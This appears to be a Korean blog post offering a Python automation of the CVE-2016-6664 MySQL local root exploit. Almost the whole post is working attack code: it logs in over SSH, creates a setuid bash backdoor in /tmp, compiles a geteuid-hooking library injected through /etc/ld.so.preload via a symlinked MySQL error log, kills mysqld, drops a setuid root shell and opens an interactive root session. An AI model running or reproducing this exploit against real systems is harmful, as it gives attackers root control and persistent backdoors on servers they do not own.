반응형
Cve-2016-6664 ][ python으로 포팅 및 자동 exploit
1.소스
'''
write by SpeeDr00t
'''
from jkc_header import *
from cshell import *
from CSshConnector import *
class Cve20166664 :
def __init__(self, _host, _id , _passwd ) :
self.shell = ''
self.ssh = ''
self.log_path = ''
self.backdoor_src = '/bin/bash'
self.backdoor = '/tmp/mysqlrootsh'
self.preload_file = '/etc/ld.so.preload'
self.exploit_src = '/tmp/exploit.c'
self.exploit = '/tmp/exploit.so'
self.root_shell_src ='/tmp/speedroot.c'
self.root_shell ='/tmp/speedroot'
self.connect( _host , _id , _passwd )
def get_log_path(self) :
return self.log_path
def do_print(self , _name = '' , _data = '\n' ) :
print " -- > %s : %s " % ( _name , _data )
def connect(self, _host , _id , _passwd ) :
self.shell = CSshConnector(_host ,_id,_passwd)
self.ssh = self.shell.get_ssh()
def log_file_path(self) :
self.log_path = self.shell.send_cmd('ps aux | grep mysql | awk -F\'log-error=\' \'{ print $2 }\' | cut -d\' \' -f1 | grep \'/\'')
self.do_print("log_path",self.log_path)
def check_id(self) :
chk_id = self.shell.send_cmd('id | grep mysql')
self.do_print('check id',chk_id)
def do_check_file(self, _file) :
result = self.shell.send_cmd('ls -ltr ' + _file )
self.do_print('check file ', result )
if( result == '' ) :
return 0
else :
return 1
def do_create_backdoor(self) :
cmd = "cp %s %s " % ( self.backdoor_src , self.backdoor )
self.shell.send_cmd(cmd)
self.do_print('create backdoor ',cmd)
def do_upload_exploit(self) :
self.ssh.upload_data("""
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("/tmp/mysqlrootsh", 0, 0);
chmod("/tmp/mysqlrootsh", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
""",self.exploit_src)
self.do_print('do upload exloit' ,'ok')
self.ssh.gcc(['-Wall','-fPIC','-shared','-o',self.exploit,self.exploit_src,'-ldl'])
self.do_print('compile' ,'ok')
self.do_check_file(self.exploit )
def do_upload_root_shell(self) :
self.ssh.upload_data("""
#include <stdio.h>
int main( int argc , char ** argv )
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
""",self.root_shell_src)
self.do_print('do upload root shell' ,'ok')
self.ssh.gcc(['-o',self.root_shell,self.root_shell_src])
self.do_print('compile' ,'ok')
self.do_check_file(self.root_shell_src )
def do_delete(self, _file ) :
self.shell.send_cmd('rm ' + self.log_path )
self.do_print('rm ' ,self.log_path)
self.do_check_file(self.log_path)
def do_check_link_file(self):
self.do_check_file( self.preload_file )
self.do_check_file( self.log_path )
def do_link(self) :
cmd = "ln -s %s %s" % ( self.preload_file , self.log_path )
self.shell.send_cmd(cmd)
self.do_print('link' , cmd )
self.do_check_link_file()
def do_symlink(self) :
self.do_check_link_file()
# rm /usr/local/mysql/data/debian.err
self.do_delete(self.log_path)
self.do_link()
def do_killall_mysqld(self) :
self.do_print('killall mysqld' )
self.shell.send_cmd('killall mysqld')
def do_echo(self) :
#print self.ssh.echo([self.exploit,">",self.preload_file])
self.shell.send_cmd("echo " + self.exploit + " > " + self.preload_file)
def do_cat(self, _file ) :
cmd = "cat %s " % ( _file )
self.shell.send_cmd(cmd)
self.do_print(cmd )
def do_check_backdoor(self) :
self.do_check_file( self.preload_file )
self.do_check_file( self.preload_file + " | grep rws | grep -q root " )
def do_chmod(self, _file ) :
cmd = "chmod 755 %s" % ( _file )
self.shell.send_cmd(cmd)
self.do_print(cmd )
def do_sudo(self) :
self.shell.send_cmd("sudo 2>/dev/null >/dev/null")
def do_clear(self) :
cmd = "%s -p -c rm -f %s;rm -f %s" % (self.backdoor , self.preload_file, self.exploit )
self.shell.send_cmd(cmd)
self.do_print(cmd )
def do_run(self) :
cmd = "%s -p -c \"rm -f /etc/ld.so.preload; rm -f %s\"" % ( self.backdoor, self.exploit )
print self.shell.send_cmd(cmd)
self.do_print(cmd)
cmd = " command > %s -p -c %s " % (self.backdoor, self.root_shell)
#self.ssh['/tmp/mysqlrootsh -p -c /tmp/speedroot']
self.do_print(cmd)
def do_check_file_loop(self, _path) :
while(True) :
sleep(0.1)
if( self.do_check_file(_path + " | grep root " ) ) :
print "do check file loop "
# echo /tmp/exploit.so > /etc/ld.so.prelod
self.do_echo()
self.do_check_file( self.preload_file )
# rm /usr/local/mysql/data/debian.err
self.do_delete(self.log_path)
break;
def do_exploit(self) :
# get log file apth
self.log_file_path()
# check id ( mysql )
self.check_id()
# create backdoor
self.do_create_backdoor()
# upload exploit
self.do_upload_exploit()
# upload root shell(root.sh)
self.do_upload_root_shell()
# symlink the log file to /etc
self.do_symlink()
# kill all mysqld
self.do_killall_mysqld()
# wait for /etc/ld.so.preload
self.do_check_file_loop( self.preload_file )
# echo /tmp/exploit.so > /etc/ld.so.prelod
self.do_echo()
self.do_check_file( self.preload_file )
# chmod 755 /etc/ld.so.preload
self.do_chmod(self.preload_file)
# inject the exloit.so shared library to escalate privileges
self.do_sudo()
self.do_check_backdoor()
self.do_check_file( self.preload_file )
self.do_cat( self.preload_file)
self.do_run()
self.ssh.interactive()
poc = Cve20166664( '192.168.163.135', 'mysql','hacker')
poc.do_exploit()
결과
반응형
'CVE > CVE-2016-6664' 카테고리의 다른 글
| 아 귀찮아 auto exploit 프로젝트 ][ CVE-2016-6664 mysql 취약점(root 권한 상승) (0) | 2019.03.19 |
|---|
